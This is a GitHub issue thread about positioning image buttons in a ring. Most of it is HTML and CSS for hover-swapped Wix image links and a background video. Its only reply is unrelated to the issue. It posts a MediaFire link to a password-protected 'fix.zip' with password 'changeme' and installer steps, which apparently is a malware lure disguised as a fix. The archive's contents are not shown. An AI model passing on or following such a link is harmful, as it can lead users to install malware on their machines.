### ISSUE TITLE
Button in ring

### ISSUE THREAD

**Issue by Amarjeet-Kaur-Gill** [Amarjeet-Kaur-Gill/WebsiteDeveloper#1]
<style type="text/css">
     
        .fring {
            margin-bottom: 17px;
        }
        img.testimonials {
            margin-right: 17px;
            width: 230px !important;
        }
        img.portfolio {
            margin-right: 17px;
        }
        .inner-part-ring2 {
            position: relative;
            top: 67px;
            left: -176px;
/*            z-index: 999;*/
          z-index: -9; 
        }
        img.play {
            position: absolute;
            left: 123px;
            z-index: 9;
            top: 101px;
            width: 100px;
        }
       .back {
    position: absolute;
    width: 378px;
    height: 380px;
    border-radius: 50%;
    overflow: hidden;
    object-fit: cover;
    top: -18px;
    left: -15px;
}
        .wteam {
            position: absolute;
            left: -1px;
            top: -1px;
            opacity: 0;
            visibility: hidden;
            transition: opacity .5s ease-out, visibility 1s ease-out;
            width: 230px;
            transition: .5s;
        }
        .team:hover .wteam {
               opacity: 1;
    visibility: visible;
    transition: 1s;
    top: -23px;
    left: 35px;
        }
        .team,.newtem,.ringi {
            transition: 1s;
        }
        .team:hover .newtem {
               opacity: 0;
/*    translate: 5% -8%;*/
    transition: .5s;
        }
         .wtestimonials {
            position: absolute;
            left: 4px;
            top: 5px;
            opacity: 0;
            visibility: hidden;
            transition: opacity .5s ease-out, visibility 1s ease-out;
            width: 230px;
            transition: .5s;
        }
         .wportfolio {
            position: absolute;
            left: 4px;
            top: 1px;
            opacity: 0;
            visibility: hidden;
            transition: opacity .5s ease-out, visibility 1s ease-out;
            width: 230px;
            transition: .5s;
        }
         .wservices {
            position: absolute;
            left: 4px;
            top: 0px;
            opacity: 0;
            visibility: hidden;
            transition: opacity .5s ease-out, visibility 1s ease-out;
            width: 230px;
            transition: .5s;
        }
        .team4:hover .wtestimonials {
    position: absolute;
    left: -25px;
    top: -23px;
    transition: opacity .5s ease-out, visibility 1s ease-out;
    width: 230px;
    transition: 1s;
     opacity: 1;
            visibility: visible;
}
 .team4:hover .testimonials {
    opacity: 0;
    transition: .5s;
 }
 .testimonials {
    transition: 1s;
 }

    .team2:hover .wportfolio {
    position: absolute;
    left: -28px;
    top: 26px;
    transition: opacity .5s ease-out, visibility 1s ease-out;
    width: 230px;
    transition: 1s;
     opacity: 1;
            visibility: visible;
}
 .team2:hover .portfolio {
    opacity: 0;
    transition: .5s;
 }
 .wportfolio {
    transition: 1s;
 }
 .team3:hover .wservices {
    position: absolute;
    left: 28px;
    top: 26px;
    transition: opacity .5s ease-out, visibility 1s ease-out;
    width: 230px;
    transition: 1s;
     opacity: 1;
            visibility: visible;
}
 .team3:hover .services {
    opacity: 0;
    transition: .5s;
 }
 .wservices {
    transition: 1s;
 }
 .team4,.team3,.team2,.team{
    z-index: 999;
    flex-direction: column;
    align-items: center;
    position: relative;
 }
 .ring {
    display: flex;
    justify-content: center;
    align-items: center;
    padding: 20px;
   padding-top: 60px;
}

.container {
    display: flex;
    justify-content: center;
    align-items: center;
    flex-wrap: wrap;
}

.ringi {
    display: flex;
    flex-direction: column;
    align-items: center;
}

.fring, .sendring {
    display: flex;
    justify-content: center;
    align-items: center;
    margin-bottom: 20px;
}
.inner-part-ring {
    display: flex;
    justify-content: center;
    align-items: center;
    position: absolute;
}
img.newtem {
    width: 230px;
}
img.portfolio {
    margin-right: 17px;
    width: 230px;
}
img.services {
    width: 230px;
}
    </style>
    <section class="ring">
        <div class="container">
            <div class="ringi">
                <div class="fring">
                    <a href="https://events03729.wixsite.com/tolostudio/testimonial" class="team4" target="_top" >
                        <img src="https://static.wixstatic.com/media/a33ef8_7cd0089fd3f14cbfbb017c68729a3e57~mv2.png" class="testimonials">
                        <img src="https://static.wixstatic.com/media/a33ef8_aa419bfef72e4d77af269691976d2aef~mv2.png" class="wtestimonials">
                    </a>
                    <a href="https://events03729.wixsite.com/tolostudio/team" class="team"target="_top" >
                        <img src="https://static.wixstatic.com/media/a33ef8_23857b7abdf246eeb60f061956eebe18~mv2.png" class="newtem">
                        <img src="https://static.wixstatic.com/media/a33ef8_cd1c90c6ff924cfca2f3f5c50c1919ad~mv2.png" class="wteam">
                    </a>
                </div>
                <div class="sendring">
                    <a href="https://events03729.wixsite.com/tolostudio/portfolio" class="team2" target="_top" >
                        <img src="https://static.wixstatic.com/media/a33ef8_b765fa0443cf461685d0e4f69a072b6f~mv2.png" class="portfolio">
                        <img src="https://static.wixstatic.com/media/a33ef8_40e3b03b79af4ad09faee475f6972a6a~mv2.png" class="wportfolio">
                    </a>
                     <a href="https://events03729.wixsite.com/tolostudio/services" class="team3" target="_top" >
                        <img src="https://static.wixstatic.com/media/a33ef8_f31d1a1fd101404ea8f837328e0424b3~mv2.png" class="services">
                        <img src="https://static.wixstatic.com/media/a33ef8_8f660e5408424a6f8d334f2e3cfc7ba1~mv2.png" class="wservices">
                    </a>
                </div>
                <div class="inner-part-ring">
                 <div class="inner-part-ring2">
                 <a href="javascript:voidmain(0);" class="team3">
                        
                        
                        <video autoplay muted loop class="back">
            <source src="https://video.wixstatic.com/video/413aa6_70b865cf7caa4a14823855aba3739648/1080p/mp4/file.mp4" type="video/mp4">
            Your browser does not support the video tag.
        </video>
                    </a>
                   </div>

                </div>
            </div>
        </div>
    </section>

**Comment by bkballoon** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
